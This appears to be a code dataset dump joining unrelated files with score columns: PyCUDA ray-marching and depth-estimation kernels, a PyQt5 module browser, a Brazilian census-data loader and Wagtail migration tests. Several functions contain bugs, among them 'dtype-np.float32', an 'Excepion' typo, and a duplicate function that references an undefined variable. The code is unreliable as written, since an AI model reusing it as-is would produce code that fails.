grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marching(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marching")
cuda_fp.prepare("i" + "P"*9)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
blocks = n_rays / threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata
)
return fp
def batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers. Finally directly convert the per voxel depth distribution to a depth map
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new,
float * depth_map
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
// We need to find the voxel center with the highest probability
// based on the S_new
float * Sr = S_new + r*$max_voxels;
float max = -INFINITY;
int max_idx = 0;
for (int i=0; i<$max_voxels; i++) {
if (Sr[i] > max) {
max_idx = i;
max = Sr[i];
}
}
// Associate the voxel_center with id max_idx with a 3D point in
// world coordinates
int idx_x, idx_y, idx_z;
int dim_x = 3*$grid_y*$grid_z;
int dim_y = 3*$grid_z;
int dim_z = 3;
idx_x = ray_voxel_indices[3*$max_voxels*r + 3*max_idx];
idx_y = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 1];
idx_z = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 2];
float point[3];
for (int i=0; i<3; i++) {
point[i] = voxel_grid[idx_x*dim_x + idx_y*dim_y + idx_z*dim_z + i];
}
// Get the distance from the camera center
float sum = 0.0;
for (int i=0; i<3; i++) {
sum += pow(point[i] - camera_center[i], 2);
}
depth_map[r] = sqrt(sum);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth")
cuda_fp.prepare("i" + "P"*10)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
depth_map,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
blocks = n_rays / threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata,
depth_map.gpudata
)
return fp
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
# Move to GPU to save some time frome copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
# Start iterationg over the batch of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
)
idxs = ray_idxs[i:i+batch_size]
ray_voxel_indices[idxs] = ray_voxel_indices_gpu.get()[:len(idxs)]
ray_voxel_count[idxs] = ray_voxel_count_gpu.get()[:len(idxs)]
S_new[idxs] = s_gpu.get()[:len(idxs)]
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
# Move to GPU to save some time frome copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
depth_map = to_gpu(
np.zeros(H*W, dtype-np.float32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
# Start iterationg over the batch of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
depth_map
)
return depth_map.get().reshape(W, H).T | 0.902526 | 0.61396 |
import sys
import pkgutil as pkg
# pip install PyQt5 to install the library
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QLineEdit, QTextEdit, QListWidget, QComboBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtCore import QStringListModel, QFile, QTextStream, Qt
from PyQt5.QtGui import QIcon
import PyQt5.QtWidgets
import PyQt5.QtSql
import PyQt5.QtMultimedia
import PyQt5.QtWebEngineWidgets
import PyQt5.QtWebEngine
import PyQt5.QtWebEngineCore
import PyQt5.QtPositioning
import PyQt5.QtNetwork
# Based on your imported modules
class HelperText(QTextEdit):
def __init__(self, obj):
super().__init__()
self.setStyleSheet('''
background-color: white;
color: black;
font-size: 35px;
''')
self.resize(1200, 1000)
self.setWindowTitle('Help Information')
self.setReadOnly(True)
help_text = obj.__doc__
self.setText(help_text)
class PythonNavigator(QWidget):
def __init__(self):
super().__init__()
self.resize(1600, 1200)
self.setWindowTitle('Qt Module Navigation')
self.setWindowIcon(self.style().standardIcon(0))
self.module_object = None
self.model = None
self.layout = QVBoxLayout()
available_modules = ('QtWidgets', 'QtCore', 'QtGui', 'QtSql', 'QtNetwork', 'QtPositioning', 'QtWebEngine', 'QtWebEngineCore', 'QtWebEngineWidgets')
# combobox widget
self.comboModules = QComboBox()
self.comboModules.addItems(available_modules)
self.comboModules.currentIndexChanged.connect(self.updateModuleList)
self.layout.addWidget(self.comboModules)
self.search = QLineEdit()
self.search.textChanged.connect(self.filter_items)
self.layout.addWidget(self.search)
layoutLabels = QHBoxLayout()
self.layout.addLayout(layoutLabels)
self.labelSelectedClass = QLabel('Selected Class: ')
self.labelSelectedMemeber= QLabel('Selected Memeber: ')
layoutLabels.addWidget(self.labelSelectedClass)
layoutLabels.addWidget(self.labelSelectedMemeber)
layoutListWidgets = QHBoxLayout()
self.layout.addLayout(layoutListWidgets)
self.listWidgetClasses = QListWidget()
self.listWidgetClasses.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetClasses.itemSelectionChanged.connect(self.updateClassList)
self.listWidgetClasses.doubleClicked.connect(lambda : self.displayHelper('class'))
layoutListWidgets.addWidget(self.listWidgetClasses)
self.listWidgetMemebers = QListWidget()
self.listWidgetMemebers.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetMemebers.itemSelectionChanged.connect(self.updateMemeberlabel)
self.listWidgetMemebers.doubleClicked.connect(lambda : self.displayHelper('member'))
layoutListWidgets.addWidget(self.listWidgetMemebers)
layoutStatus = QHBoxLayout()
self.status = QLabel()
buyMeACoffee = QLabel("Buy Me a Coffee --> " + "<a href=\"https://www.paypal.com/paypalme/jiejenn/5\" style=\"color:#d4fcfb\">Click Me</a>")
buyMeACoffee.setTextFormat(Qt.RichText)
buyMeACoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
buyMeACoffee.setOpenExternalLinks(True)
buyMeACoffee.setStyleSheet('color: #ffffff')
appVersion = QLabel('Created by <NAME> (v1.2)')
layoutStatus.addWidget(self.status)
layoutStatus.addStretch()
layoutStatus.addWidget(buyMeACoffee, alignment=Qt.AlignRight)
layoutStatus.addWidget(appVersion, alignment=Qt.AlignRight)
self.layout.addLayout(layoutStatus)
self.setLayout(self.layout)
self.updateModuleList()
def displayHelper(self, by_type: str):
if by_type == 'class':
class_name = self.listWidgetClasses.currentItem().text()
obj = getattr(self.module_object, class_name)
elif by_type == 'member':
class_name = self.listWidgetClasses.currentItem().text()
memeber_name = self.listWidgetMemebers.currentItem().text()
obj = getattr(getattr(self.module_object, class_name), memeber_name)
else:
self.status.setText('No information available')
return
self.help = HelperText(obj)
self.help.show()
def updateMemeberlabel(self):
try:
member_name = self.listWidgetMemebers.currentItem().text()
self.labelSelectedMemeber.setText('Selected Memeber: {0}'.format(member_name))
except Exception as e:
self.status.setText(str(e))
def updateClassList(self):
self.listWidgetMemebers.clear()
class_name = self.listWidgetClasses.currentItem().text()
try:
obj = getattr(self.module_object, class_name)
except AttributeError as e:
self.status.setText(str(e))
return
self.listWidgetMemebers.addItems(dir(obj))
self.status.clear()
try:
self.labelSelectedClass.setText('Selected Class: {0}'.format(class_name))
except Excepion as e:
self.status.setText(str(e))
def updateModuleList(self):
module_name = self.comboModules.currentText()
self.module_object = sys.modules.get('PyQt5.' + module_name)
self.reset_fields()
if self.module_object is None:
self.status.setText('Information is not available')
return
module_dir = dir(self.module_object)
self.model = QStringListModel()
self.model.setStringList(module_dir)
self.listWidgetClasses.addItems(module_dir)
self.status.clear()
def reset_fields(self):
self.listWidgetClasses.clear()
self.listWidgetMemebers.clear()
self.labelSelectedClass.setText('Selected Class: ')
self.labelSelectedMemeber.setText('Selected Memeber: ')
def filter_items(self):
filtered_text = str(self.search.text()).lower()
if self.model:
for row in range(self.model.rowCount()):
if filtered_text in str(self.model.index(row).data()).lower():
self.listWidgetClasses.setRowHidden(row, False)
else:
self.listWidgetClasses.setRowHidden(row, True)
if __name__ == '__main__':
app = QApplication(sys.argv)
css_file = QFile(r'dark_theme (4k).css')
css_file.open(QFile.ReadOnly)
stream = QTextStream(css_file)
pyNavigator = PythonNavigator()
pyNavigator.setStyleSheet(stream.readAll())
pyNavigator.show()
try:
sys.exit(app.exec_())
except SystemExit:
print('Closing Window...') | pyqt5_module_navigator.py | import sys
import pkgutil as pkg
# pip install PyQt5 to install the library
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QLineEdit, QTextEdit, QListWidget, QComboBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtCore import QStringListModel, QFile, QTextStream, Qt
from PyQt5.QtGui import QIcon
import PyQt5.QtWidgets
import PyQt5.QtSql
import PyQt5.QtMultimedia
import PyQt5.QtWebEngineWidgets
import PyQt5.QtWebEngine
import PyQt5.QtWebEngineCore
import PyQt5.QtPositioning
import PyQt5.QtNetwork
# Based on your imported modules
class HelperText(QTextEdit):
def __init__(self, obj):
super().__init__()
self.setStyleSheet('''
background-color: white;
color: black;
font-size: 35px;
''')
self.resize(1200, 1000)
self.setWindowTitle('Help Information')
self.setReadOnly(True)
help_text = obj.__doc__
self.setText(help_text)
class PythonNavigator(QWidget):
def __init__(self):
super().__init__()
self.resize(1600, 1200)
self.setWindowTitle('Qt Module Navigation')
self.setWindowIcon(self.style().standardIcon(0))
self.module_object = None
self.model = None
self.layout = QVBoxLayout()
available_modules = ('QtWidgets', 'QtCore', 'QtGui', 'QtSql', 'QtNetwork', 'QtPositioning', 'QtWebEngine', 'QtWebEngineCore', 'QtWebEngineWidgets')
# combobox widget
self.comboModules = QComboBox()
self.comboModules.addItems(available_modules)
self.comboModules.currentIndexChanged.connect(self.updateModuleList)
self.layout.addWidget(self.comboModules)
self.search = QLineEdit()
self.search.textChanged.connect(self.filter_items)
self.layout.addWidget(self.search)
layoutLabels = QHBoxLayout()
self.layout.addLayout(layoutLabels)
self.labelSelectedClass = QLabel('Selected Class: ')
self.labelSelectedMemeber= QLabel('Selected Memeber: ')
layoutLabels.addWidget(self.labelSelectedClass)
layoutLabels.addWidget(self.labelSelectedMemeber)
layoutListWidgets = QHBoxLayout()
self.layout.addLayout(layoutListWidgets)
self.listWidgetClasses = QListWidget()
self.listWidgetClasses.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetClasses.itemSelectionChanged.connect(self.updateClassList)
self.listWidgetClasses.doubleClicked.connect(lambda : self.displayHelper('class'))
layoutListWidgets.addWidget(self.listWidgetClasses)
self.listWidgetMemebers = QListWidget()
self.listWidgetMemebers.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetMemebers.itemSelectionChanged.connect(self.updateMemeberlabel)
self.listWidgetMemebers.doubleClicked.connect(lambda : self.displayHelper('member'))
layoutListWidgets.addWidget(self.listWidgetMemebers)
layoutStatus = QHBoxLayout()
self.status = QLabel()
buyMeACoffee = QLabel("Buy Me a Coffee --> " + "<a href=\"https://www.paypal.com/paypalme/jiejenn/5\" style=\"color:#d4fcfb\">Click Me</a>")
buyMeACoffee.setTextFormat(Qt.RichText)
buyMeACoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
buyMeACoffee.setOpenExternalLinks(True)
buyMeACoffee.setStyleSheet('color: #ffffff')
appVersion = QLabel('Created by <NAME> (v1.2)')
layoutStatus.addWidget(self.status)
layoutStatus.addStretch()
layoutStatus.addWidget(buyMeACoffee, alignment=Qt.AlignRight)
layoutStatus.addWidget(appVersion, alignment=Qt.AlignRight)
self.layout.addLayout(layoutStatus)
self.setLayout(self.layout)
self.updateModuleList()
def displayHelper(self, by_type: str):
if by_type == 'class':
class_name = self.listWidgetClasses.currentItem().text()
obj = getattr(self.module_object, class_name)
elif by_type == 'member':
class_name = self.listWidgetClasses.currentItem().text()
memeber_name = self.listWidgetMemebers.currentItem().text()
obj = getattr(getattr(self.module_object, class_name), memeber_name)
else:
self.status.setText('No information available')
return
self.help = HelperText(obj)
self.help.show()
def updateMemeberlabel(self):
try:
member_name = self.listWidgetMemebers.currentItem().text()
self.labelSelectedMemeber.setText('Selected Memeber: {0}'.format(member_name))
except Exception as e:
self.status.setText(str(e))
def updateClassList(self):
self.listWidgetMemebers.clear()
class_name = self.listWidgetClasses.currentItem().text()
try:
obj = getattr(self.module_object, class_name)
except AttributeError as e:
self.status.setText(str(e))
return
self.listWidgetMemebers.addItems(dir(obj))
self.status.clear()
try:
self.labelSelectedClass.setText('Selected Class: {0}'.format(class_name))
except Excepion as e:
self.status.setText(str(e))
def updateModuleList(self):
module_name = self.comboModules.currentText()
self.module_object = sys.modules.get('PyQt5.' + module_name)
self.reset_fields()
if self.module_object is None:
self.status.setText('Information is not available')
return
module_dir = dir(self.module_object)
self.model = QStringListModel()
self.model.setStringList(module_dir)
self.listWidgetClasses.addItems(module_dir)
self.status.clear()
def reset_fields(self):
self.listWidgetClasses.clear()
self.listWidgetMemebers.clear()
self.labelSelectedClass.setText('Selected Class: ')
self.labelSelectedMemeber.setText('Selected Memeber: ')
def filter_items(self):
filtered_text = str(self.search.text()).lower()
if self.model:
for row in range(self.model.rowCount()):
if filtered_text in str(self.model.index(row).data()).lower():
self.listWidgetClasses.setRowHidden(row, False)
else:
self.listWidgetClasses.setRowHidden(row, True)
if __name__ == '__main__':
app = QApplication(sys.argv)
css_file = QFile(r'dark_theme (4k).css')
css_file.open(QFile.ReadOnly)
stream = QTextStream(css_file)
pyNavigator = PythonNavigator()
pyNavigator.setStyleSheet(stream.readAll())
pyNavigator.show()
try:
sys.exit(app.exec_())
except SystemExit:
print('Closing Window...') | 0.181916 | 0.063715 |
import os
import pandas as pd
import geopandas as gpd
files = ['prop_urban_2000_2010.csv',
'pop_women_2010.csv',
'pop_men_2010.csv',
'idhm_2000_2010.csv',
'estimativas_pop.csv',
'interest_real.csv',
'num_people_age_gender_AP_2010.csv',
'qualification_APs_2010.csv',
'firms_by_APs2010_t0_full.csv',
'firms_by_APs2010_t1_full.csv',
'average_num_members_families_2010.csv'
]
def read_data(path, sep=';'):
return pd.read_csv(path, sep=sep)
def read_mun(data, municipalities, col='cod_mun'):
return data[data[col].isin(municipalities)]
def read_data_aps(data, municipalities, col='AP'):
return data[data[col].astype(str).str[:7].isin([str(m) for m in municipalities])]
def descriptive_stats(data, col):
print(col)
print('max', data[col].max())
print('min', data[col].min())
print('mean', data[col].mean())
print('std', data[col].std())
print('obs', len(data[col]))
print('\n')
if __name__ == '__main__':
p = 'input'
acp = 'BRASILIA'
mun = pd.read_csv('input/ACPs_MUN_CODES.csv', sep=';')
mun = mun[mun['ACPs'] == acp].cod_mun.to_list()
f0 = read_data(os.path.join(p, files[0]))
f0 = read_mun(f0, mun)
descriptive_stats(f0, '2010')
f1 = read_data(os.path.join(p, files[1]))
f1 = read_mun(f1, mun)
f1c = f1.drop('cod_mun', axis=1)
f2 = read_data(os.path.join(p, files[2]))
f2 = read_mun(f2, mun)
f2c = f2.drop('cod_mun', axis=1)
f3 = read_data(os.path.join(p, files[3]))
f3 = read_mun(f3, [2010], 'year')
f3 = read_mun(f3, mun)
descriptive_stats(f3, 'idhm')
f4 = read_data(os.path.join(p, files[4]), ',')
f4 = read_mun(f4, mun, 'mun_code')
f4c = f4.drop('mun_code', axis=1)
f5 = read_data(os.path.join(p, files[5]), ';')
f5d = f5.loc[:240]
descriptive_stats(f5d, 'mortgage')
f6 = read_data(os.path.join(p, files[6]), ';')
f6 = read_mun(f6, mun, 'AREAP')
descriptive_stats(f6, 'num_people')
f7 = read_data(os.path.join(p, files[7]), ',')
f7 = read_data_aps(f7, mun, 'code')
f7c = f7.drop('code', axis=1)
f8 = read_data(os.path.join(p, files[8]))
f9 = read_data(os.path.join(p, files[9]))
f8 = read_data_aps(f8, mun, 'AP')
f9 = read_data_aps(f9, mun, 'AP')
descriptive_stats(f8, 'num_firms')
descriptive_stats(f9, 'num_firms')
f10 = read_data(os.path.join(p, files[10]), ',')
f10 = read_data_aps(f10, mun, 'AREAP')
descriptive_stats(f10, 'avg_num_people')
p1 = 'shapes/2010/areas/DF.shp'
geo_df = gpd.read_file(os.path.join(p, p1))
p2 = 'shapes/2010/areas/GO.shp'
geo_go = gpd.read_file(os.path.join(p, p2))
geo_go = read_data_aps(geo_go, mun, 'mun_code')
# STATE-LEVEL, GENDER
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fertility/fertility_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# Mortality
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
for sex in ['men', 'women']:
p3 = f'mortality/mortality_{sex}_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# FPM
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fpm/{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ',')
t = read_mun(t, mun, 'cod')
out = pd.concat([out, t], axis=0) | auxiliary/read_input_data.py | import os
import pandas as pd
import geopandas as gpd
files = ['prop_urban_2000_2010.csv',
'pop_women_2010.csv',
'pop_men_2010.csv',
'idhm_2000_2010.csv',
'estimativas_pop.csv',
'interest_real.csv',
'num_people_age_gender_AP_2010.csv',
'qualification_APs_2010.csv',
'firms_by_APs2010_t0_full.csv',
'firms_by_APs2010_t1_full.csv',
'average_num_members_families_2010.csv'
]
def read_data(path, sep=';'):
return pd.read_csv(path, sep=sep)
def read_mun(data, municipalities, col='cod_mun'):
return data[data[col].isin(municipalities)]
def read_data_aps(data, municipalities, col='AP'):
return data[data[col].astype(str).str[:7].isin([str(m) for m in municipalities])]
def descriptive_stats(data, col):
print(col)
print('max', data[col].max())
print('min', data[col].min())
print('mean', data[col].mean())
print('std', data[col].std())
print('obs', len(data[col]))
print('\n')
if __name__ == '__main__':
p = 'input'
acp = 'BRASILIA'
mun = pd.read_csv('input/ACPs_MUN_CODES.csv', sep=';')
mun = mun[mun['ACPs'] == acp].cod_mun.to_list()
f0 = read_data(os.path.join(p, files[0]))
f0 = read_mun(f0, mun)
descriptive_stats(f0, '2010')
f1 = read_data(os.path.join(p, files[1]))
f1 = read_mun(f1, mun)
f1c = f1.drop('cod_mun', axis=1)
f2 = read_data(os.path.join(p, files[2]))
f2 = read_mun(f2, mun)
f2c = f2.drop('cod_mun', axis=1)
f3 = read_data(os.path.join(p, files[3]))
f3 = read_mun(f3, [2010], 'year')
f3 = read_mun(f3, mun)
descriptive_stats(f3, 'idhm')
f4 = read_data(os.path.join(p, files[4]), ',')
f4 = read_mun(f4, mun, 'mun_code')
f4c = f4.drop('mun_code', axis=1)
f5 = read_data(os.path.join(p, files[5]), ';')
f5d = f5.loc[:240]
descriptive_stats(f5d, 'mortgage')
f6 = read_data(os.path.join(p, files[6]), ';')
f6 = read_mun(f6, mun, 'AREAP')
descriptive_stats(f6, 'num_people')
f7 = read_data(os.path.join(p, files[7]), ',')
f7 = read_data_aps(f7, mun, 'code')
f7c = f7.drop('code', axis=1)
f8 = read_data(os.path.join(p, files[8]))
f9 = read_data(os.path.join(p, files[9]))
f8 = read_data_aps(f8, mun, 'AP')
f9 = read_data_aps(f9, mun, 'AP')
descriptive_stats(f8, 'num_firms')
descriptive_stats(f9, 'num_firms')
f10 = read_data(os.path.join(p, files[10]), ',')
f10 = read_data_aps(f10, mun, 'AREAP')
descriptive_stats(f10, 'avg_num_people')
p1 = 'shapes/2010/areas/DF.shp'
geo_df = gpd.read_file(os.path.join(p, p1))
p2 = 'shapes/2010/areas/GO.shp'
geo_go = gpd.read_file(os.path.join(p, p2))
geo_go = read_data_aps(geo_go, mun, 'mun_code')
# STATE-LEVEL, GENDER
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fertility/fertility_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# Mortality
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
for sex in ['men', 'women']:
p3 = f'mortality/mortality_{sex}_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# FPM
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fpm/{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ',')
t = read_mun(t, mun, 'cod')
out = pd.concat([out, t], axis=0) | 0.272025 | 0.229298 |
from unittest import mock
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.tests.testapp.models import StreamPage
from v1.tests.wagtail_pages.helpers import save_new_page
from v1.util.migrations import (
get_streamfield_data,
is_page,
migrate_block,
migrate_page_types_and_fields,
migrate_stream_field,
migrate_streamfield_data,
set_streamfield_data,
)
class MigrationsUtilTestCase(TestCase):
def setUp(self):
self.root = Page.objects.get(slug="cfgov")
self.page = StreamPage(title="Test Page", slug="testpage")
save_new_page(self.page, self.root)
set_streamfield_data(
self.page, "body", [{"type": "text", "value": "some text"}]
)
self.revision = self.page.save_revision()
self.page.save()
def test_is_page_page(self):
"""Test that a page is verifably a page"""
self.assertTrue(is_page(self.page))
def test_is_page_revision(self):
"""Test that a revision is verifiably not a page"""
self.assertFalse(is_page(self.revision))
def test_get_streamfield_data_page(self):
"""Test that get_streamfield_data fetches the data correctly
from a page object."""
data = get_streamfield_data(self.page, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision(self):
"""Test that get_streamfield_data fetches the data correctly
from a revision object."""
data = get_streamfield_data(self.revision, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
